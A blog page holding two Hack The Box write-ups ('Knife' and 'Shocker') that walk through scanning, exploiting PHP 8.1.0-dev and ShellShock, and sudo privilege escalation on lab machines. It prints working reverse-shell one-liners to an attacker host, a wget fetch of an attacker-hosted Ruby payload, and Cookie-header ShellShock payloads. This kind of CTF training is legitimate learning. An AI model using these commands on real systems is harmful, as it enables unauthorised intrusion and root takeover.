Wednesday, June 23, 2021

Knife | Hack The Box | Walkthrough

Hi Guys!! In this blog we will cover the HTB CTF challenge machine named "knife" which is an easy machine. Capture the flag (CTF) challenge/games often touch on many aspects of information security . CTF challenges are full of learning on new vulnerabilities, RCE, Privilege Escalation, etc.

Note: Before you go through this blog, "Try Harder" may be you won't need this.

Contents
1. Scanning
2. Enumeration
3. Exploiting
4. Privilege Escalation
  1. Scanning
First step would be to scan the ports and services running in the target network. One of the most popular port scanner tool is Nmap which allows the attacker to discover all active ports and services running on the target network. Below screenshot shows that port 22 and 80 are opened.

nmap -sC -sV 10.10.10.242

Knife | HTB | Walkthrough
Exhibit 1

  1. Enumeration
Now that we know port 80 and 22 are open, we will run nikto tool on port 80. Nikto is a command-line vulnerability scanner that scans web-servers for dangerous files/CGIs, outdated server software and other problems.
We can see the php version (PHP/8.1.0-dev ) being disclosed in "x-powered-by" header.

nikto -h http://10.10.10.242/

Knife | HTB | Walkthrough
Exhibit 2
  1. Exploiting
When checking for the version exploit in google, we discovered a PHP 8.1.0-dev ‘User-Agentt‘ Exploit Code, which is available on exploit db. Download the Exploit Code.

Knife | HTB | Walkthrough
Exhibit 3

Let’s run the Exploit code. Provide the target URL and press Enter. You would get a reverse shell as shown in the screenshot below -

Knife | HTB | Walkthrough
Exhibit 4

Since we are getting a garbage issue in this shell, let’s take a reliable reverse shell using the below commands as shown in the screenshot -

nc -nvlp 4444

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [Attacker's IP] 4444 >/tmp/f

python3 -c 'import pty; pty.spawn("/bin/bash")'


Knife | HTB | Walkthrough
Exhibit 5

Congrats!! We have the reverse shell of user james and we have got the user.txt flag.
  1. Privilege Escalation
I looked at the sudo permission of the user and found something interesting with sudo -l.

sudo -l

Knife | HTB | Walkthrough
Exhibit 6

The user could execute binary /usr/bin/knife as a root without the need of password. After checking the manual of knife, we could run the exec command to execute any file/command we want,

sudo /usr/bin/knife exec --exec "exec '/bin/sh -i'"

OR

//Create a file named "root.rb" and add the below code -
#!/usr/bin/env ruby
exec "/bin/bash -c '/bin/bash >& /dev/tcp/[Attacker's IP]/1234 0>&1'"
//Execute the code using the following -
cd /tmp; wget http://[Attacker's IP]:6666/root.rb
sudo /usr/bin/knife exec /tmp/root.rb

BINGO!!! As shown in the below screenshot, we executed the above command and got the root shell.

Knife | HTB | Walkthrough
Exhibit 7

Hope you learned and enjoyed it!!


Posted by at 2 comments:

Friday, June 18, 2021

Shocker | Hack The Box | CTF Walkthrough

Hi Guys!! In this blog, we will cover the HTB CTF challenge machine named "Shocker" which is an easy machine.  Capture the flag (CTF) challenge/games can help you understand many aspects of information security. CTF/HTB challenges are full of learning on new vulnerabilities, RCE, Privilege Escalation, etc.


Contents
1. Scanning
2. Enumeration
3. Exploiting
4. Privilege Escalation


  1. Scanning
The first step would be to scan the ports and services running in the target network. One of the most popular port scanner tool is Nmap which allows us to discover all active ports and services that are running on the target network.

nmap -sC -sV 10.10.10.56

Exhibit 1
  1. Enumeration
Now that we know we have 80 and 2222 ports Open, let's see what is running on 80. There is just a picture.

Exhibit 2


Let us enumerate the webserver using Dirb. 

Dirb/Dirbuster is a tool to brute force any directory based on wordlists.

dirb -h http://10.10.10.56/

Exhibit 3

Note: The request to any directory without a trailing slash is mostly handled by sending a redirect request to the same path with a trailing slash. Some of the tools like `dirb` and `dirsearch` take the wordlist and check each entry sending two requests, one with a trailing slash and the other without a trailing slash. And `gobuster` and `feroxbuster` have -f flag to force add the trailing slash at the end of directories.

We have got 403 Forbidden when accessing the cgi-bin directory as shown in Exhibit 4.

Exhibit 4

Let’s use the tool again with dirb -x with the possible extensions .php, .sh and .html.

dirb http://10.10.10.56/cgi-bin /usr/share/wordlists/dirb/common.txt -X extension

Exhibit 5

As shown in Exhibit 5, we found a user.sh file. Let's check the response we are getting when browsing user.sh file.

Note: As we can see in Exhibit 6, there is 2 Content-Type header with value text/x-sh and text/plain. It looks like the script was trying to add a text/plain header, but it is added after the empty line, thus being part of the body and not the header that's why when browsing this file in a browser, the file was getting downloaded.

The output of the "uptime" command in Linux shows a similar kind of response, suggesting this is a CGI bash script running on Shocker. Cgi-bin is mostly vulnerable to ShellShock.

Exhibit 6

ShellShock is a bash vulnerability that was discovered in 2014 which has to do with Bash's "function export" feature. It allows an attacker to execute commands that should be unavailable to them. An initial POC was this:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

This had a huge impact as a lot of different programs takes user input and use it to define environment variables, and the famous of which was CGI-based web servers.
  1. Exploiting
Since the name of the machine is Shocker and CGI script was found, it is OK to assume this is related to ShellShock.

Let's check if Shellshock vulnerability exists using Nmap script -

nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh 10.10.10.56

Exhibit 7

Nmap Script shows that it is vulnerable to ShellShock vulnerability. 

Let's tamper with the Cookie string by adding the following value and see the response -

Cookie: () { :; }; echo ; /bin/ls

Exhibit 8

The server responded with the user.sh value.

Cookie: () { :; }; echo; /usr/bin/id

Exhibit 9

Note: The commands need full paths, as the $PATH variable is empty in the environment in which the ShellShock executes. The payload was successfully executed in Referer, Cookie, and User-Agent.

Let's get a reverse shell by exploiting this vulnerability. We will start a Netcat listener on TCP port 5555 `nc -nvlp 5555`, and then send the following:

Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.37/5555 0>&1

Exhibit 10

Congrats!! We got the reverse shell and user flag as shown in Exhibit 11.

Exhibit 11
  1. Privilege Escalation
When doing a manual basic check "sudo -l", it shows that the user can execute /usr/bin/perl without any password. Let us use this misconfiguration and try to gain root access.

Exhibit 12

We abuse the misconfiguration of sudo by using the exec function to upgrade the shell we are working on -

Exhibit 13

BINGO!! We got the root shell and root flag.

Hope you learned and enjoyed it!!
Posted by at 1 comment:
Subscribe to: Posts (Atom)